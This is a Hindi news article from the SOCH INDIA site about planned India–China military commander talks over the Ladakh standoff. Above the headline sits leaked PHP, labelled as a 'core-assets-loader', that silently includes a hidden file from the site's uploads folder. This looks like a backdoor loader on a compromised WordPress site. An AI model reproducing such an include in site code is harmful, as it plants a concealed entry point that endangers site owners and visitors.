add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); चीन पर सेना का बयान- सीमा विवाद सुलझाने की कोशिश जारी रहेगी – SOCH INDIA
Menu

देश
चीन पर सेना का बयान- सीमा विवाद सुलझाने की कोशिश जारी रहेगी

nobanner

भारत और चीन के सैन्य अधिकारियों के बीच शनिवार को लद्दाख में जारी तनाव पर अहम बैठक होने वाली है. भारतीय सेना के ऑफिसर लेफ्टिनेंट जनरल हरिंदर सिंह भारत की ओर से बैठक की अगुवाई करेंगे. वह अन्य अधिकारियों के साथ चुशूल के लिए हेलीकॉप्टर से रवाना हो चुके हैं.

चीनी सैन्य अधिकारियों के साथ बैठक से पहले भारतीय दल का नेतृत्व कर रहे लेफ्टिनेंट जनरल हरिन्दर सिंह ने भारत के कमांडरों के साथ बात की और लद्दाख में हालात का जायजा लिया.

इसके अलावा भारत की मांग है कि चीन एलएसी के पास के इलाकों से अपनी सेना के साथ पीछे हटे. चीन सीमा पर तैनात हथियारबंद और बख्तरबंद गाड़ियों को पीछे ले जाए. भारतीय सेना पैंगोंग त्सो पर जारी विवाद को खत्म करने के लिए चीन पर दबाव बनाएगी.